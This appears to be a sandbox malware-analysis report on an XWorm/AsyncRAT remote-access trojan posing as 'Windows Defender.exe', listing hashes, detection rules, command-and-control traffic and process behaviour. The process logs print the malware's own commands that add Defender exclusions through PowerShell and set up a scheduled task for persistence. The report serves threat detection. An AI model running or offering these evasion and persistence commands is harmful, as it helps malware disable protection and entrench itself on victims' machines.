                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xg0j3rl5.dw2.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yv2pw3ou.4ls.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Windows Defender.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\Windows Defender.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):87552
                                    Entropy (8bit):5.981787823477636
                                    Encrypted:false
                                    SSDEEP:1536:+RWb0LuvJ1F1ZhZYJAlMK9iQbRcd44gQp3vACo6ecOPoXaPJ:680Lihu+MmiQbRcd7/L4cOPoXwJ
                                    MD5:E9FF85404CBD9C9DF15E13D0E4B960B1
                                    SHA1:3269C423EBC616270BF713010B3C87976D07D06A
                                    SHA-256:576D63BF309D5FB80B9D2683B21B8257D60DD2A8FA4974982D38EBFACE89FC47
                                    SHA-512:7468AEB3D286C7D47DB80221C13B8A22D886566611E4A0C4F924E9B7CCA3B9E95C0F1FAAA071ABA2A60E9E4EB1022C6650ACB4D3A0547293910010A502393098
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Windows Defender.exe, Author: Joe Security
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Windows Defender.exe, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Windows Defender.exe, Author: ditekSHen
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 82%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...AN.f.................&...........E... ...`....@.. ....................................@..................................D..O....`..B+........................................................................... ............... ..H............text....%... ...&.................. ..`.rsrc...B+...`...,...(..............@..@.reloc...............T..............@..B.................D......H........c..........&.....................................................(....*.r...p*. *p{.*..(....*.r...p*. .O..*.s.........s.........s.........s.........*.rc..p*. ...*.r...p*. .%..*.r...p*. X...*.rL..p*. .g..*.r...p*. ..e.*..((...*.r...p*. .(T.*.r+..p*. ..<.*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*.r...p*. .5..*.r$..p*. G...*.r...p*. ~.H.*.rj..p*. .L..*.r...p*. .x!.*.r...p*. .^

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender.lnk

                                    Download File
                                    Process:C:\Users\user\Desktop\Windows Defender.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Oct 8 11:03:17 2024, mtime=Tue Oct 8 11:03:17 2024, atime=Tue Oct 8 11:03:17 2024, length=87552, window=hide
                                    Category:dropped
                                    Size (bytes):1009
                                    Entropy (8bit):5.059533917548522
                                    Encrypted:false
                                    SSDEEP:24:88bY/0bDZt8lXJtHXuRC3GuSA8aOE47OcQ7qygm:8T/0bDAl7eR495Ojhyg
                                    MD5:22D18BA7C4BB61AB966C4278B4A96DAD
                                    SHA1:93DAA71017BCACE30598F9B1FD4D686EE5316ED4
                                    SHA-256:54B862B0DFA28249F62DD30B3F7D0BAF29C2723B31D504E6C16AF3FD6FBA27D6
                                    SHA-512:C8AD285037DDFAD43186C5158DB14B67A0D1EF0FDED5802B81F7EF2F48CCF9C5B4B40028B0640A1D6F8D394687124E3B3DFA4738FDF70C82B708E4931A4A2969
                                    Malicious:false
                                    Preview:L..................F.... ....`V.z...,K..z....`V.z....V........................:..DG..Yr?.D..U..k0.&...&.......$..S...(.>.y.....w.z.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2HYE`...........................^.A.p.p.D.a.t.a...B.P.1.....HYC`..Local.<......EW<2HYE`....[.....................aP..L.o.c.a.l.....v.2..V..HYi` .WINDOW~1.EXE..Z......HYi`HYi`....).....................jf..W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...e.x.e.......c...............-.......b............r3~.....C:\Users\user\AppData\Local\Windows Defender.exe..,.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...e.x.e.............:...........|....I.J.H..K..:...`.......X.......530978...........hT..CrF.f4... ..`\9m....-...-$..hT..CrF.f4... ..`\9m....-...-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?.......

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):5.981787823477636
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Windows Screen Saver (13104/52) 0.07%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    File name:Windows Defender.exe
                                    File size:87'552 bytes
                                    MD5:e9ff85404cbd9c9df15e13d0e4b960b1
                                    SHA1:3269c423ebc616270bf713010b3c87976d07d06a
                                    SHA256:576d63bf309d5fb80b9d2683b21b8257d60dd2a8fa4974982d38ebface89fc47
                                    SHA512:7468aeb3d286c7d47db80221c13b8a22d886566611e4a0c4f924e9b7cca3b9e95c0f1faaa071aba2a60e9e4eb1022c6650acb4d3a0547293910010a502393098
                                    SSDEEP:1536:+RWb0LuvJ1F1ZhZYJAlMK9iQbRcd44gQp3vACo6ecOPoXaPJ:680Lihu+MmiQbRcd7/L4cOPoXwJ
                                    TLSH:1A833A3867D4F419D1FE56BDC8A132F28678ADD7DC02821FDC853D863632AE489316E9
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...AN.f.................&...........E... ...`....@.. ....................................@................................

                                    File Icon

                                    Icon Hash:0fe88cec4c6d2b0e

                                    Static PE Info

                                    General

                                    Entrypoint:0x41450e
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x66F04E41 [Sun Sep 22 17:05:05 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x144bc0x4f.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x2b42.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1a0000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000x125140x12600ae2e374800c8c90b2ff67d40ea44669cFalse0.6112749787414966SysEx File - Casio6.131632657995026IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rsrc0x160000x2b420x2c005d5b33972a709c9e5929372654fc5d92False0.12908380681818182data2.5681418743518893IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x1a0000xc0x200a5a3ecb3b21c5366d6ed47ea556ef582False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x161300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.08246887966804979
                                    RT_GROUP_ICON0x186d80x14data1.1
                                    RT_VERSION0x186ec0x26cdata0.4596774193548387
                                    RT_MANIFEST0x189580x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                    Imports

                                    DLLImport
                                    mscoree.dll_CorExeMain

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-10-08T14:03:37.561657+02002853957ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.649989147.185.221.2254699TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 8, 2024 14:02:16.956760883 CEST4974380192.168.2.6208.95.112.1
                                    Oct 8, 2024 14:02:16.961703062 CEST8049743208.95.112.1192.168.2.6
                                    Oct 8, 2024 14:02:16.961818933 CEST4974380192.168.2.6208.95.112.1
                                    Oct 8, 2024 14:02:16.962527037 CEST4974380192.168.2.6208.95.112.1
                                    Oct 8, 2024 14:02:16.967447042 CEST8049743208.95.112.1192.168.2.6
                                    Oct 8, 2024 14:02:17.429711103 CEST8049743208.95.112.1192.168.2.6
                                    Oct 8, 2024 14:02:17.479492903 CEST4974380192.168.2.6208.95.112.1
                                    Oct 8, 2024 14:03:23.315824986 CEST4998954699192.168.2.6147.185.221.22
                                    Oct 8, 2024 14:03:23.320900917 CEST5469949989147.185.221.22192.168.2.6
                                    Oct 8, 2024 14:03:23.320981979 CEST4998954699192.168.2.6147.185.221.22
                                    Oct 8, 2024 14:03:23.375153065 CEST4998954699192.168.2.6147.185.221.22
                                    Oct 8, 2024 14:03:23.380176067 CEST5469949989147.185.221.22192.168.2.6
                                    Oct 8, 2024 14:03:37.561656952 CEST4998954699192.168.2.6147.185.221.22
                                    Oct 8, 2024 14:03:37.567859888 CEST5469949989147.185.221.22192.168.2.6
                                    Oct 8, 2024 14:03:44.687972069 CEST5469949989147.185.221.22192.168.2.6
                                    Oct 8, 2024 14:03:44.688139915 CEST4998954699192.168.2.6147.185.221.22
                                    Oct 8, 2024 14:03:46.589091063 CEST4998954699192.168.2.6147.185.221.22
                                    Oct 8, 2024 14:03:46.590886116 CEST4999154699192.168.2.6147.185.221.22
                                    Oct 8, 2024 14:03:46.786158085 CEST5469949989147.185.221.22192.168.2.6
                                    Oct 8, 2024 14:03:46.786201000 CEST5469949991147.185.221.22192.168.2.6
                                    Oct 8, 2024 14:03:46.786468983 CEST4999154699192.168.2.6147.185.221.22
                                    Oct 8, 2024 14:03:46.818416119 CEST4999154699192.168.2.6147.185.221.22
                                    Oct 8, 2024 14:03:46.823528051 CEST5469949991147.185.221.22192.168.2.6
                                    Oct 8, 2024 14:03:57.434212923 CEST4974380192.168.2.6208.95.112.1
                                    Oct 8, 2024 14:03:57.439575911 CEST8049743208.95.112.1192.168.2.6
                                    Oct 8, 2024 14:03:57.439711094 CEST4974380192.168.2.6208.95.112.1
                                    Oct 8, 2024 14:03:58.920809031 CEST4999154699192.168.2.6147.185.221.22
                                    Oct 8, 2024 14:03:58.925635099 CEST5469949991147.185.221.22192.168.2.6
                                    Oct 8, 2024 14:04:08.192418098 CEST5469949991147.185.221.22192.168.2.6
                                    Oct 8, 2024 14:04:08.192564964 CEST4999154699192.168.2.6147.185.221.22
                                    Oct 8, 2024 14:04:09.057712078 CEST4999154699192.168.2.6147.185.221.22
                                    Oct 8, 2024 14:04:09.059654951 CEST4999354699192.168.2.6147.185.221.22
                                    Oct 8, 2024 14:04:09.063049078 CEST5469949991147.185.221.22192.168.2.6
                                    Oct 8, 2024 14:04:09.064639091 CEST5469949993147.185.221.22192.168.2.6
                                    Oct 8, 2024 14:04:09.064721107 CEST4999354699192.168.2.6147.185.221.22
                                    Oct 8, 2024 14:04:09.103039980 CEST4999354699192.168.2.6147.185.221.22
                                    Oct 8, 2024 14:04:09.108041048 CEST5469949993147.185.221.22192.168.2.6
                                    Oct 8, 2024 14:04:20.167112112 CEST4999354699192.168.2.6147.185.221.22
                                    Oct 8, 2024 14:04:20.172275066 CEST5469949993147.185.221.22192.168.2.6

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 8, 2024 14:02:16.943597078 CEST5373153192.168.2.61.1.1.1
                                    Oct 8, 2024 14:02:16.951306105 CEST53537311.1.1.1192.168.2.6
                                    Oct 8, 2024 14:03:23.298361063 CEST5858053192.168.2.61.1.1.1
                                    Oct 8, 2024 14:03:23.311382055 CEST53585801.1.1.1192.168.2.6

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Oct 8, 2024 14:02:16.943597078 CEST192.168.2.61.1.1.10x5102Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                    Oct 8, 2024 14:03:23.298361063 CEST192.168.2.61.1.1.10x62cStandard query (0)22.ip.gl.ply.ggA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Oct 8, 2024 14:02:11.035805941 CEST1.1.1.1192.168.2.60xc98No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                    Oct 8, 2024 14:02:11.035805941 CEST1.1.1.1192.168.2.60xc98No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                    Oct 8, 2024 14:02:16.951306105 CEST1.1.1.1192.168.2.60x5102No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                    Oct 8, 2024 14:03:23.311382055 CEST1.1.1.1192.168.2.60x62cNo error (0)22.ip.gl.ply.gg147.185.221.22A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • ip-api.com

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.649743208.95.112.1804144C:\Users\user\Desktop\Windows Defender.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 8, 2024 14:02:16.962527037 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                    Host: ip-api.com
                                    Connection: Keep-Alive
                                    Oct 8, 2024 14:02:17.429711103 CEST175INHTTP/1.1 200 OK
                                    Date: Tue, 08 Oct 2024 12:02:16 GMT
                                    Content-Type: text/plain; charset=utf-8
                                    Content-Length: 6
                                    Access-Control-Allow-Origin: *
                                    X-Ttl: 60
                                    X-Rl: 44
                                    Data Raw: 66 61 6c 73 65 0a
                                    Data Ascii: false


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:08:02:11
                                    Start date:08/10/2024
                                    Path:C:\Users\user\Desktop\Windows Defender.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\Windows Defender.exe"
                                    Imagebase:0xad0000
                                    File size:87'552 bytes
                                    MD5 hash:E9FF85404CBD9C9DF15E13D0E4B960B1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3487954673.0000000012EA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.3487954673.0000000012EA1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3482001337.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2229425020.0000000000AD2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2229425020.0000000000AD2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                    Reputation:low
                                    Has exited:false

                                    General

                                    Target ID:2
                                    Start time:08:02:16
                                    Start date:08/10/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe'
                                    Imagebase:0x7ff6e3d50000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:3
                                    Start time:08:02:16
                                    Start date:08/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:08:02:25
                                    Start date:08/10/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'
                                    Imagebase:0x7ff6e3d50000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:08:02:25
                                    Start date:08/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:9
                                    Start time:08:02:35
                                    Start date:08/10/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe'
                                    Imagebase:0x7ff6e3d50000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:10
                                    Start time:08:02:35
                                    Start date:08/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:11
                                    Start time:08:02:52
                                    Start date:08/10/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'
                                    Imagebase:0x7ff6e3d50000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:12
                                    Start time:08:02:52
                                    Start date:08/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:16
                                    Start time:08:03:17
                                    Start date:08/10/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender" /tr "C:\Users\user\AppData\Local\Windows Defender.exe"
                                    Imagebase:0x7ff6885d0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:17
                                    Start time:08:03:17
                                    Start date:08/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:18
                                    Start time:08:03:17
                                    Start date:08/10/2024
                                    Path:C:\Users\user\AppData\Local\Windows Defender.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Local\Windows Defender.exe"
                                    Imagebase:0xc10000
                                    File size:87'552 bytes
                                    MD5 hash:E9FF85404CBD9C9DF15E13D0E4B960B1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Windows Defender.exe, Author: Joe Security
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Windows Defender.exe, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Windows Defender.exe, Author: ditekSHen
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 82%, ReversingLabs
                                    Has exited:true

                                    General

                                    Target ID:20
                                    Start time:08:03:25
                                    Start date:08/10/2024
                                    Path:C:\Users\user\AppData\Local\Windows Defender.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Local\Windows Defender.exe"
                                    Imagebase:0xca0000
                                    File size:87'552 bytes
                                    MD5 hash:E9FF85404CBD9C9DF15E13D0E4B960B1
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:21
                                    Start time:08:03:33
                                    Start date:08/10/2024
                                    Path:C:\Users\user\AppData\Local\Windows Defender.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Local\Windows Defender.exe"
                                    Imagebase:0x560000
                                    File size:87'552 bytes
